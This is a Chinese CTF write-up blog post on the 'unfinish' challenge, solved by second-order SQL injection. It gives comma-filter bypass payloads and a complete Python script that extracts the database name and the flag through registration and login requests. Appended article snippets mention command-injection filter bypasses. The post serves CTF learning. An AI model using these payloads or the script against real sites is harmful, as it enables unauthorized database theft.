攻防世界----unfinish

最新推荐文章于 2025-03-20 21:07:58 发布
最新推荐文章于 2025-03-20 21:07:58 发布
阅读量851 收藏 3
点赞数 2
分类专栏: ctf相关 文章标签: servlet
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_44418229/article/details/126114762
版权

知识点:SQL二次注入

sql注入流程:找到注入点,进行fuzz测试,根据fuzz测试结果绕过,查flag

1.拿到题目后,先进行目录扫描

2.经过一系列测试:包括在register页面注册,然后去login页面查看

发现,在register页面的username字段是可以回显的

为什么要在username字段测试注入点,而不是在邮箱或者密码?

因为我们能看到username的回显。

 

判断注入点

在用户名处输入

0' and '1

 

 

确定了存在注入 

3.进行fuzz测试,看能不能找到被过滤的关键字

尝试对username字段进行fuzz测试

测试范围为所有的单字符(ascii值33-127)

 长度为904的报文被过滤了,也就是逗号

目前看来,只过滤了逗号 

逗号的绕过:from for绕过

substr(database(),1) -> substr(database() from 1 for 1)

payload如下

username: 0' + ascii(substr(database() from 1 for 1)) +'0

原因:

在注册界面,有三个字段因此我们猜测原句为

insert('邮箱','用户名','密码')

而用户名是可以存在注入,并且具有回显的

为什么要用 0?

ascii可以将字符转化为ascii的值,0+任何数字都等于原字符,用其他数字也是可以的

0附近的两个单引号是为了闭合原句的单引号,如下

insert('邮箱','0' + ascii(substr(database() from 1 for 1)) +'0','密码')

第二个payload为

0' + ascii(substr(database() from 2 for 1)) +'0

 

接下来就是写脚本,让脚本帮我们爆破。 

脚本思路:在register页面进行注册

账号就 111@163.com? 对?进行递增

用户名就是正常的盲注

密码就是 admin

注册好后,去login.php页面,拿邮箱和密码登录,然后获取到回显的用户名

利用chr()函数将数字转化为字母

脚本可以去wp里拿

import requests
import re

register_url = "http://61.147.171.105:64712/register.php"
login_url = "http://61.147.171.105:64712/login.php"
database = ""
table_name = ""
column_name = ""
flag = ""
#获取数据库名
for i in range(1,10):
    register_data = {
        'email':'test@test'+ str(i),
        'username':"0'+ascii(substr((select database()) from %d for 1))+'0"%i,
        'password':123
        }
    r = requests.post(url=register_url,data=register_data)
    login_data = {
        'email':'test@test'+ str(i),
        'password':123
        }
    r = requests.post(url=login_url,data=login_data)
    match = re.search(r'<span class="user-name">\s*(\d*)\s*</span>',r.text)
    asc = match.group(1)
    if asc == '0':
        break
    database = database + chr(int(asc))
print('database:',database)
#获取表名
'''
for i in range(1,20):
    register_data = {
        'email':'test@test'+ str(i),
        'username':"0'+ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()) from %d for 1))+'0"%i,
        'password':123
        }
    r = requests.post(url=register_url,data=register_data)
    print(r.text)
    login_data = {
        'email':'test@test'+ str(i),
        'password':123
        }
    r = requests.post(url=login_url,data=login_data)
    r.encoding = r.apparent_encoding
    print(r.text)
    match = re.search(r'<span class="user-name">\s*(\d*)\s*</span>',r.text)
    asc = match.group(1)
    if asc == '0':
        break
    table_name = table_name + chr(int(asc))
print('table_name:',table_name)
'''
#获取flag
for i in range(1,100):
    register_data = {
        'email':'test@test'+ str(i) + str(i),
        'username':"0'+ascii(substr((select * from flag) from %d for 1))+'0"%i,
        'password':123
        }
    r = requests.post(url=register_url,data=register_data)
    login_data = {
        'email':'test@test'+ str(i) + str(i),
        'password':123
        }
    r = requests.post(url=login_url,data=login_data)
    match = re.search(r'<span class="user-name">\s*(\d*)\s*</span>',r.text)
    asc = match.group(1)
    if asc == '0':
        break
    flag = flag + chr(int(asc))
print('flag:',flag)

脚本解说

1.re.search(r'<span class="user-name">\s*(\d*)\s*</span>', res_.text)

因为用户名在html中是这么显示的

 因此我们需要用到research函数结合正则匹配

re.search(r'<span class="user-name">\s*(\d*)\s*</span>', res_.text)

\s匹配空白符
\d匹配数字

python正则表达式re.search()怎么使用? | w3c笔记 (w3cschool.cn)

 2.asc = match.group(1)

原因:group(n)匹配第n个括号内的值

上文中 group(1) 就是匹配到 (\d*)也就是我们要的数字

import re
 
content = "abc123def"
rex_compile = re.compile("([a-z]*)([0-9]*)([a-z]*)")
rex = rex_compile.search(content)
print(rex.group())
print(rex.group(0))  # group()和group(0) 一样匹配的是整体
print(rex.group(1))  # 匹配第一个小括号的内容
print(rex.group(2))  # 匹配第二个小括号的内容
print(rex.group(3))  # 匹配第三个小括号的内容

3.注意点

由于用户名是有限制的,因此在跑表名的时候会因为这个问题导致失败,需要手工去跑

攻防世界web进阶区unfinish
gongjingege的博客
08-12 608
题目描述:SQL 题目链接有三个,登录,注册,主页 可以看出这道题考察sql注入 打开靶机链接,看到一个登陆界面 有登录就可能有注册,url栏register.php 先注册一个 注册成功后跳转到主页,同时在主页显示用户名 唔,鬼刀里的冰公主,品味不错,俺喜欢︿( ̄︶ ̄)︿ 先试着在注册界面手注吧 构造插入的注册语句 payload:insert into tables values(‘email′,′0′+ascii(substr((selectdatabase())from1for1))+′0′,
攻防世界Web:unfinish
Light_inthe_eyes的博客
10-20 464
打开页面后,是一个登录页面: 用御剑扫一扫,发现有注册页面: 用burpsuite抓注册页面: 尝试构造sql盲注语句:username=1' and left(database(),1)>'a'# 得到结果为nnnnoooo!!!过滤了很多 通过抓包出来的三个参数,猜测注册的语句是:insert into tables value('$email','$username','$passwpord'); 登录成功后语句:SELECT * FROM tables WHERE email = ''$em
攻防世界 unfinish
CyhDl666的博客
02-25 594
题目描述:sql注入 访问进去是个登录页面 dirsearch扫描了一下 访问register.php 注册了个账号 登录进去好像没什么用 返回登录页面 但是 这里我想到了一个注入方式 在我写sql注入基础知识的时候提到过 但是 没有仔细研究 二次注入 这里注入的点应该是在register.php页面中的name中 因为邮箱和密码还需要登录时候使用 具体可以看我前面的文章 单引号注册失败了 于是我将用户名改为root' and '1这里注册成功了 也就是说这里的闭合方式应该是单引号闭合 且没有我之前学.
[学习笔记]攻防世界-unfinish
qq_58742026的博客
03-20 595
SQL,二次注入,RCS过滤
攻防世界web进阶区之unfinish
qq_45756971的博客
08-08 524
题目:进入所给链接,发现是一个登陆界面 我们进入注册界面题目为二次注入,参照大佬给出的代码,修改注册url和登录url即可跑出flag import requests import time from bs4 import BeautifulSoup #html解析器 def getDatabase(): database = '' for i in range(10): data_database = { 'username':"0'+
【愚公系列】2023年06月 攻防世界-Web(unfinish
时光隧道
06-15 4427
SQL注入是一种常见的攻击方式,它利用web应用程序漏洞,通过向Web应用程序提交恶意的SQL语句,从而获得对数据库的访问权限。SQL注入常见的攻击方式包括:基于错误的注入攻击(error-based):通过构造报错语句,把数据库中的错误信息暴露给攻击者,从而获取敏感信息。基于盲注的攻击(blind-based):攻击者无法直接从Web应用程序获得数据库中的信息,但是他们可以通过提交变异的查询,来判断查询结果是否正确,进而推断出数据库中的信息。
攻防世界 web高手进阶区 6分题(ics-07、unfinish、i-got-id-200)
闵行小鱼塘
08-02 897
继续ctf的旅程,攻防世界web高手进阶区的6分题:ics-07、unfinish、i-got-id-200
攻防世界-web高手进阶区
zji
04-25 6986
文章目录攻防世界-web高手进阶区一、baby_web二、Training-WWW-Robots1.引入库2.读入数据总结 攻防世界-web高手进阶区 提示:这里是记录web的题目,这里我基本不讲很多细节,请自行下载Burpsuite,web使用的等等工具。 一、baby_web 非常的简单,bp抓包直接把1.php去掉后,就看的flag了。 二、Training-WWW-Robots 非常的简单,点网页进去后,看到了robots.txt进去看到一个可以看到他有一个不允许访问的文件f10g.php,在
攻防世界 WEB unfinish
qq_41696858的博客
08-31 196
这题考的是sql注入里的二次注入 看了半天login界面,发现没什么好利用的,考虑是否其他页面有可供利用的注入点 先用dirsearch扫一波,发现register页面,这个页面里多了一个username参数,那么这就是我们这题的关键点,在注册完成后,登录, username会在主页里面回显,而且login界面显然没有对username做过滤, 所以手动尝试payload:1’+'1 只要登陆成功后页面回显的username是2,就说明二次注入成立 下面就是爆破问题 由于过滤了一堆关键字,所以需要通过asc
攻防世界高手进阶区通关教程(2)
玄道的网安博客
05-16 2909
我们就直接开始吧 web2 源码给出了加密后的字符串,我们解密即可 代码块 import base64 def python_decode(string): zimu = "abcdefghijklmnopqrstuvwxyz" rot_13 ="" for i in string: if i.isdigit(): rot_13 += i else: try:
xctf攻防世界 Web高手进阶区 unfinish
l8947943的博客
01-02 4268
1. 进入环境,查看页面 我的心情和这个图像一样懵逼,拿起dirsearch就是一顿乱扫。如图: 发现有register.php 2. 问题分析 登入register.php,注册相关账户并登录 直接吧usrname给显示出来了,也就是说,注册提交了usrname数据,然后又从数据库中查询了username并回显,那么问题就清晰了一丢丢,想办法通过username注入数据,在回显时候再执行。查了查相关的wp,这种方式叫做二次注入: 二次注入的原理,在第一次进行数据库插入数据的时候(注册时),仅
攻防世界web进阶区unfinish详解
hxhxhxhxx的博客
08-09 4567
攻防世界web进阶区unfinish详解题目详解 题目 详解 我们使用御剑,扫描一波 我们进入注册页面查看,发现这个,有注册的话猜一下二次注入(这里注入,然后去页面看结果) 我们先拿AWVS试试, 哦~我的上帝,它存在注入 我们试试,burp的fuzz看看他过滤了什么 还是过滤了蛮多的 这些是都没过滤的 既然知道了他是sql注入 那么我们为啥不用sqlmap呢 我们使用sqlmap,发现只能知道这里有注入点,但是过滤很严重 我们需要找找合适的tamper 哦~我的上帝,果然不行,看来还得看看师
攻防世界】unseping
m0_74979597的博客
09-07 775
表示easeargs属性的值为一个数组,其中1表示数组元素的数量,i:0表示数组的索引为0,s:2:""表示数组的值为"",0表示值的长度。这里很特殊,又不是写一些特殊字符,让它错误的认为代码,或构成新代码来进行绕过,它只是一种与字符串比较进行匹配,只要没有包含。命令与文件之间有空格,怎么办,用${IFS} 这是特殊的环境变量,在Unix/linux 用来字段分割符;O:4:"ease":2: 类名为ease的对象,4表示类名的长度,2表示对象属性的数量。2.绕过简单的防火墙,用“”,‘’,
攻防世界 unseping
weixin_68416970的博客
01-17 891
攻防世界平台 web题库矩阵 新手模式 unseping
攻防世界-unseping
m0_49025459的博客
12-17 3022
通过分析上面的代码我们可以得出,我们只要控制ctf这个参数的输入的值,就可以达成命令执行的效果,但是上面的代码,我们需要两个参数ping和后面命令执行的值,我们首先就得看看当前目录下都有些什么东西。我们看见 flag_1s_here目录下有一个flag_831b69012c67b35f.php,我们猜想运行这个php或者将它拿出来就可以获得flag,我们访问了该路径发现是空白的无法执行,那我们就用cat命令将这个php读取出来,我们可以使用三中命令读取。打开就是PHP源码,我们对源码进行分析。
攻防世界unseping
2301_76160896的博客
07-04 552
1.php反序列化漏洞原理。2.php代码审计。3.waf的绕过。
2024年最全攻防世界Web题 - unseping 总结_unseping攻防世界(1)
2401_84297796的博客
05-01 594
/把 cat flag_1s_here/flag_831b69012c67b35f.php 转为8进制如下:"\143\141\164\40\146\154\141\147\137\61\163\137\150\145\162\145\57\146\154\141\147\137\70\63\61\142\66\71\60\61\62\143\66\67\142\63\65\146\56\160\150\160"可以说是**最科学最系统的学习路线**,大家跟着这个大的方向学习准没问题。
网谷杯ctf中unfinish中这道题怎么做
最新发布
03-28
### 关于网谷杯 CTF 中 `unfinish` 题目的解题思路 #### 背景分析 CTF竞赛中的Web类题目通常涉及多种漏洞利用技术,例如SQL注入、文件包含、命令执行等。根据提供的参考资料[^1],可以推测该题目可能涉及到一种特定的绕过机制或者字符串处理逻辑。 #### 文件路径操作与过滤规避 从引用的内容来看,可能存在一个动态加载模板的功能实现代码片段[^2]: ```php $file = "templates/" . $page . ".php"; assert("strpos('$file', '...') === false"); ``` 上述PHP脚本通过拼接变量 `$page` 来构建最终要引入的文件名,并且使用了 `assert()` 函数来进行安全校验。这里的重点在于如何构造合适的输入使得能够成功跳转到预期之外的目标文件,同时满足断言条件。 对于这种类型的挑战,尝试寻找可被解析为合法语句但仍能突破限制的特殊字符组合是一种常见策略。比如利用编码转换(URL编码、HTML实体化)、大小写变换等方式避开显式的黑名单匹配规则。 #### 数据库交互技巧 另外,在MySQL环境下进行数据提取时,除了传统的基于布尔盲注或时间延迟的方法外,还可以借助ASCII数值比较或是十六进制表示形式来简化查询过程并提高效率[^3]。具体而言就是先确定目标字段首字母对应的十进制数值得范围,再逐步逼近直至完全还原整个字符串内容;或者是直接将整列记录转化为HEX串后再做进一步拆分重组运算。 以下是采用后者的一个简单示范程序: ```sql SELECT HEX(column_name) FROM table_name WHERE condition; -- 假设返回结果为4D7953514C,则可通过如下方法得到明文"MySQL" SELECT UNHEX('4D7953514C'); ``` 需要注意的是当遇到超长Hex序列时记得适当裁剪长度以免超出系统允许的最大尺寸界限。 #### 综合应用建议 针对当前描述的具体场景——即名为“Unfinished”的赛题解答方案设计上,可以从以下几个方面入手考虑综合运用以上提到的技术要点: - 探索是否存在未受保护的服务端渲染入口可供调用; - 如果发现有类似功能存在则研究其参数验证流程查找潜在缺陷; - 结合实际环境特点选用恰当的数据检索手段快速定位敏感信息位置。 最后提醒一点,在真实比赛过程中务必遵循主办方设定的比赛规则,合理合法地完成各项任务!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

jjj34

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值